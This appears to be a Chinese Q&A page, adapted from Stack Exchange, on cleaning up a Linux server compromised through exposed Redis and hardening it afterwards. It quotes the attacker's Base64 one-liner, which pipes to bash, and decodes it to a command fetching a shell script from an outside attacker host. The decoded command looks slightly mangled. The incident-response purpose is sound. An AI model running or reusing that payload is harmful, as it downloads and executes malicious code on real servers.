You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Redis键自动变为backup序列、值转Base64,Linux环境异常求助

Redis键被篡改为backupN且值为恶意Base64脚本的排查与修复

你的服务器已遭遇入侵,攻击者利用Redis的访问漏洞植入了恶意定时任务,同时篡改Redis键值对留存恶意指令。先拆解你提供的示例脚本:

echo Y2QxIGh0dHA6Ly9raXNzLmEtZG9nLnRvcC9iMmY2MjgvYi5zaAo=|base64 -d|bash|bash 

Base64解码后得到cd1 http://kiss.a-dog.top/b2f628/b.sh,这是攻击者用来下载并执行挖矿或其他恶意程序的命令。

紧急处置

  1. 暂停Redis服务,切断攻击者利用通道:
    systemctl stop redis-server  # 适用于systemd系统
    # 或
    service redis stop  # 适用于init.d系统
    
  2. 清理恶意定时任务:
    • 查看当前用户定时任务:crontab -l,找到可疑条目后执行crontab -e删除对应行
    • 检查系统级定时任务目录,删除可疑文件:
      ls /etc/cron.d/ /etc/cron.hourly/ /etc/cron.daily/ /etc/cron.weekly/ /etc/cron.monthly/
      rm -f 可疑文件名
      
  3. 清理Redis中的恶意键值对:
    启动Redis后执行:
    redis-cli keys "backup*" | xargs redis-cli del
    
  4. 查杀恶意进程:
    用top或ps aux定位CPU/内存占用异常的陌生进程,执行kill -9 进程ID终止,同时删除进程对应的执行文件。

根源修复

  1. 加固Redis访问控制:
    • 修改redis.conf,绑定本地IP:bind 127.0.0.1,禁止公网直接访问
    • 确保保护模式开启:protected-mode yes
    • 设置强密码:requirepass 复杂随机密码,重启Redis后连接必须验证密码
    • 禁止Redis以root用户运行,创建专用redis用户启动服务
  2. 排查其他入侵入口:
    • 查看SSH日志/var/log/auth.log,清理异常登录记录,禁用密码登录改用SSH密钥,限制允许登录的IP范围
    • 检查系统用户列表cat /etc/passwd,删除陌生可疑用户
    • 若服务器部署了Web服务,排查是否存在SQL注入、文件上传等漏洞,及时修补
  3. 检查Redis数据目录:
    查看redis.conf中的dir配置项,进入对应目录删除可疑脚本或程序文件。

长期预防

  • 定期更新Redis和系统内核、软件包,修复已知漏洞
  • 启用Redis日志功能,定期查看/var/log/redis/redis-server.log,及时发现异常访问
  • 用防火墙(iptables/ufw)限制Redis端口(默认6379)的访问,仅允许信任IP连接

内容的提问来源于stack exchange,提问作者Budh

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.18 09:25:40